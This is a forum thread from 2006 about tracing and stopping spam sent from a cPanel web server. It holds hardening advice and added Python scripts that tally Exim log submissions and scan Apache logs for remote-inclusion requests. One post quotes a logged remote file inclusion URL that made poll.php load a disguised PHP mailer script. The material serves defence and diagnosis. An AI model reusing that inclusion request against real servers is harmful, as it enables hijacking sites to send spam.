
Stopping spam being sent from server - without disabling email 100%...

Discussion in 'E-mail Discussions' started by harveycarpenter, Mar 9, 2006.

  1. harveycarpenter

    Hi,

    Is there a way to stop spammers sending out thousands of emails from your server?

    I've tried both reducing the number of emails a domain can send out to 20, and disabling mailing lists, but I just picked out an email ready to be sent 10,000 from my mail queue!

    The message originated from cPanel, it said - looked like it had been sent from Horde or Neomail etc.

    Thanks
     
  2. mohit

    Hi,
    Have you disabled the nobody user yet? If not, do it.
    Most probably a PHP script must have been used to send out spam.

    Check what the source of those mails is: look into the headers, find the user a/c, and suspend it.

    You may also check mail statistics to find out the account used; it might have some clues, I hope.

    Also, looking into exim_mainlog would help you in tracing the user.

    You can also look for spam issues on this forum, as it's quite often been discussed in the past.

    see ya,
    mohit
     
  3. djblamire

    I'm trying to trace back spam that originated from my server. (Sent through nobody - probably by a PHP script).

    I cannot find any logs that will show me the account name it originated from.

    I no longer have access to cpanel/whm, and can only access the old files on the hard drive directly.

    I have taken a look at exim_mainlog and tried to find the apache http log, but not had any luck.

    Any ideas where I can start? - I'm trying to stop this happening again,

    Thanks
    Daniel
     
  4. brianoz

    This is a frequently asked question, and as such you'll find lots of stuff in the cpanel forums about how to deal with it.

    How I (personally) prevent spam from being sent out:

    1. Install mod_security and configure it to stop Bcc:/Cc: injection attacks (search here or WHT for details)

    2. Set max emails per hour to 150, can tweak individual domains wanting more in /var/cpanel/maxemails (search for details).

    3. Rebuild apache to run with phpsuexec/suexec. (search these forums for details; don't forget you need to make sure your user script permissions are correct after converting)

    4. Keep installed scripts (especially phpBB) up to date. Use mod_security rules to prevent known script attacks first, then go through and update old scripts.

    5. Go to spamcop.com and sign up for server alerts so you can see if anyone tries to spam from your server (this allows you to become aware of it early, rather than late).

    Follow all these points and you'll rarely, if ever, have a problem with outgoing spam.

    If spam is actually being sent, you can enable some exim logging detail so that you can track down the exact script. This makes your logs huge so don't run with it unless you are getting spam.

    Some other non-technical ways to try to discourage spammers from signing up with you:
    - don't offer immediate activation of accounts - always check manually and verify suspicious orders
    - don't try to compete in the lower end of the market - someone will always be cheaper than you, and then they'll disappear 12 months later when they go broke!
    - make your stance against spam clear in your TOS and site documentation

    Here are some relevant URLs and posts:

    cpanel forums post: "spam protection guide"
    - notes on protection from both incoming and outgoing spam

    If you've not done all this before, save yourself some grief and hire one of the experts. I use and recommend configserver.com - they're professional and expert, may be hard to get on their books as they're in demand. Others are good too; you want to purchase a "security package" which should include security hardening as well as spam protection.
     
    #4 brianoz, Jun 2, 2006
    Last edited: Jun 2, 2006
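The extra exim logging detail mentioned in the post above can be summarised with a short script. This is an added example, not part of the original post: it assumes Exim is running with `log_selector = +arguments` (which writes `cwd=` lines to exim_mainlog), that accounts live under `/home/<user>`, and it uses constructed log lines.

```python
import re
from collections import Counter

# Constructed sample of exim_mainlog lines (not taken from the thread).
# The "cwd=... N args: ..." lines are what Exim logs with +arguments enabled.
SAMPLE_LOG = """\
2006-06-02 10:15:01 cwd=/home/alice/public_html/news/extras/poll 3 args: /usr/sbin/sendmail -t -i
2006-06-02 10:15:01 1FmABC-0004xy-7Q <= nobody@host.example.com U=nobody P=local S=812
2006-06-02 10:15:02 cwd=/home/alice/public_html/news/extras/poll 3 args: /usr/sbin/sendmail -t -i
2006-06-02 10:15:02 cwd=/var/spool/exim 3 args: /usr/sbin/exim -Mc 1FmABC-0004xy-7Q
2006-06-02 10:15:03 cwd=/home/alice/public_html/news/extras/poll 3 args: /usr/sbin/sendmail -t -i
2006-06-02 10:20:44 cwd=/home/bob/public_html 3 args: /usr/sbin/sendmail -t -i
2006-06-02 10:21:00 cwd=/var/spool/exim 2 args: /usr/sbin/exim -q
"""

CWD_RE = re.compile(r"^\S+ \S+ cwd=(.+?) \d+ args: (.*)$")
HOME_RE = re.compile(r"^/home/([^/]+)")  # assumption: cPanel-style /home/<user>


def tally_submissions(log_text):
    """Count sendmail-style submissions per working directory and per account."""
    by_dir, by_account = Counter(), Counter()
    for line in log_text.splitlines():
        m = CWD_RE.match(line)
        if not m:
            continue  # not a cwd= line (e.g. a "<=" arrival line)
        cwd, args = m.groups()
        argv = args.split()
        # Skip Exim's own queue runners and delivery processes; keep only
        # messages handed to the sendmail binary, which is how PHP mail() submits.
        if not argv or not argv[0].endswith("sendmail"):
            continue
        by_dir[cwd] += 1
        home = HOME_RE.match(cwd)
        by_account[home.group(1) if home else "(outside /home)"] += 1
    return by_dir, by_account


if __name__ == "__main__":
    dirs, accounts = tally_submissions(SAMPLE_LOG)
    for path, count in dirs.most_common():
        print(f"{count:6d}  {path}")
    for account, count in accounts.most_common():
        print(f"{count:6d}  account={account}")
```

The directory with the highest count is where the sending script was running, even when the message itself is logged as `U=nobody`.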
  5. tweakservers

    Check your /usr/local/cpanel/logs/access_log: if the mails were sent from webmail, there will be entries showing which users logged in to webmail at that time. Check through the log and find out which users have the most entries in the logs.
     
  6. djblamire

    Thank you very much for the information - That will certainly give me plenty to look at to try and make my server more secure.

    I have tracked down the script using the apache logs. It seemed to come through via the following method:

    Code:
    http://www.mywebsite.com/news/extras/poll/poll.php?file_newsportal=http://www.geocities.com/lud_na_kon/phpmailerr.jpg
    The phpmailerr.jpg file isn't actually an image, but a script file.

    I will of course not use this 'poll.php' script again, but is there a quick way to stop people being able to run files such as that from the URL?

    Thanks again for your assistance,

    Daniel
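The request pattern found in the post above (a query parameter whose value is a remote URL) can be searched for across an Apache access log. This is an added example, not part of the original post: it assumes the combined log format and uses constructed log lines, with a placeholder host `remote.example.net` standing in for the remote file.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format lines (not taken from the thread).
# The script path and parameter name mirror the request quoted in the post.
SAMPLE_LOG = '''\
203.0.113.7 - - [02/Jun/2006:10:14:58 +1000] "GET /news/extras/poll/poll.php?file_newsportal=http://remote.example.net/phpmailerr.jpg HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [02/Jun/2006:10:15:03 +1000] "GET /news/extras/poll/poll.php?file_newsportal=http%3A%2F%2Fremote.example.net%2Fphpmailerr.jpg HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.20 - - [02/Jun/2006:10:16:11 +1000] "GET /news/index.php?page=2 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.21 - - [02/Jun/2006:10:17:40 +1000] "GET /images/logo.jpg HTTP/1.1" 200 4300 "-" "Mozilla/5.0"
'''

# client, timestamp, method and request target from a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*"')
# a parameter value that is itself a remote URL
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_remote_includes(log_text):
    """Return one record per query parameter whose decoded value is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, when, _method, target = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append({
                    "client": client,
                    "time": when,
                    "script": parts.path,
                    "param": name,
                    "remote_host": urlsplit(value.strip()).hostname,
                })
    return hits


if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG):
        print(hit)
```

Legitimate redirect or proxy parameters also carry URLs, so review each hit against what the script is supposed to accept.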
     
  7. konrath

    :D You can fix this problem.

    http://forums.cpanel.net/showthread.php?t=50186&highlight=extended+logging






     